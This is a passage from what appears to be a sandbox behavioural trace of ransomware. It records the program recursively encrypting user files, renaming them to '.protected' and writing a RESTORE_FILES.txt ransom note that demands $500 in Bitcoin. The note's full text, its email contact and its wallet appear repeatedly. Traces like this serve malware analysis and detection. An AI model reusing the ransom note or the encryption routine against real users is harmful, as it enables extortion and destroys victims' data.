HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\hnpxh8o5.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4") returned 70 [0092.911] StrStrW (lpFirst="HNpXh8o5.mp4", lpSrch=".txt") returned 0x0 [0092.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4") returned 70 [0092.911] StrStrW (lpFirst="HNpXh8o5.mp4", lpSrch=".rar") returned 0x0 [0092.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4") returned 70 [0092.911] StrStrW (lpFirst="HNpXh8o5.mp4", lpSrch=".zip") returned 0x0 [0092.911] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.911] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.911] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.911] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.911] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.912] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.912] CloseHandle (hObject=0xd8) returned 1 [0092.912] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4.protected") returned 80 [0092.912] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\hnpxh8o5.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\hnpxh8o5.mp4.protected")) returned 1 [0092.912] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="Windows") returned -1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="Program Files") returned 1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="Program Files (x86)") returned 1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="$Recycle.bin") returned 1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="System Volume Information") returned -1 [0092.912] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi") returned 82 [0092.912] StrStrIW (lpFirst="s vZbgF fnd0l4SWf3Fx.avi", lpSrch=".protected") returned 0x0 [0092.912] lstrcmpW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="RESTORE_FILES.txt") returned 1 [0092.912] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.912] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\s vzbgf fnd0l4swf3fx.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi") returned 82 [0092.913] StrStrW (lpFirst="s vZbgF fnd0l4SWf3Fx.avi", lpSrch=".txt") returned 0x0 [0092.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi") returned 82 [0092.913] StrStrW (lpFirst="s vZbgF fnd0l4SWf3Fx.avi", lpSrch=".rar") returned 0x0 [0092.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi") returned 82 [0092.913] StrStrW (lpFirst="s vZbgF fnd0l4SWf3Fx.avi", lpSrch=".zip") returned 0x0 [0092.913] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.913] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.913] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.914] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.914] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 
[0092.914] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.914] CloseHandle (hObject=0xd8) returned 1 [0092.914] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi.protected") returned 92 [0092.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\s vzbgf fnd0l4swf3fx.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\s vzbgf fnd0l4swf3fx.avi.protected")) returned 1 [0092.914] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.914] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.915] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\RESTORE_FILES.txt") returned 75 [0092.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.915] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.915] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.916] lstrlenA (lpString="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") returned 684 [0092.916] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.916] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.916] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.916] CloseHandle (hObject=0xd4) returned 1 [0092.916] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.916] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.916] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\RESTORE_FILES.txt") returned 66 [0092.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.917] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.917] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.918] lstrlenA (lpString="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") returned 684 [0092.918] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.918] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.918] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0092.918] CloseHandle (hObject=0xb4) returned 1 [0092.919] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.919] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0092.919] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.919] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.919] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.919] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.919] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0092.919] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.919] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0092.919] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.919] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0092.919] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.919] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.920] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.920] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.920] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.920] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.920] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.920] CloseHandle (hObject=0xb4) returned 1 [0092.921] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.protected") returned 62 [0092.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.protected")) returned 1 [0092.922] FindNextFileW (in: 
hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="Windows") returned -1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="Program Files") returned -1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="Program Files (x86)") returned -1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="$Recycle.bin") returned 1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="System Volume Information") returned -1 [0092.922] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv") returned 57 [0092.922] StrStrIW (lpFirst="eGbOzuQ7K1yF.flv", lpSrch=".protected") returned 0x0 [0092.922] lstrcmpW (lpString1="eGbOzuQ7K1yF.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.922] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.922] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\egbozuq7k1yf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.923] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv") returned 57 [0092.923] StrStrW (lpFirst="eGbOzuQ7K1yF.flv", lpSrch=".txt") returned 0x0 [0092.923] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv") returned 57 [0092.923] StrStrW (lpFirst="eGbOzuQ7K1yF.flv", lpSrch=".rar") returned 0x0 [0092.923] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv") returned 57 [0092.923] StrStrW (lpFirst="eGbOzuQ7K1yF.flv", lpSrch=".zip") returned 0x0 [0092.923] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.923] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.924] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.924] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.924] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.924] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.924] CloseHandle (hObject=0xb4) returned 1 [0092.924] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv.protected") returned 67 [0092.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\egbozuq7k1yf.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\egbozuq7k1yf.flv.protected")) returned 1 [0092.925] FindNextFileW (in: 
hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="Windows") returned -1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="Program Files") returned -1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="Program Files (x86)") returned -1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="$Recycle.bin") returned 1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="System Volume Information") returned -1 [0092.925] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ") returned 49 [0092.925] lstrcmpW (lpString1="m9MLQVuZ", lpString2=".") returned 1 [0092.925] lstrcmpW (lpString1="m9MLQVuZ", lpString2="..") returned 1 [0092.925] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\*") returned 51 [0092.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.926] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.926] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.926] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.926] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.926] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.926] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\.") returned 51 [0092.926] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.926] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.926] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.926] lstrcmpiW 
(lpString1="..", lpString2="Program Files") returned -1 [0092.926] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.926] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.926] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.926] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\..") returned 52 [0092.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.926] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.926] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="Windows") returned -1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="Program Files") returned -1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="Program Files (x86)") returned -1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc 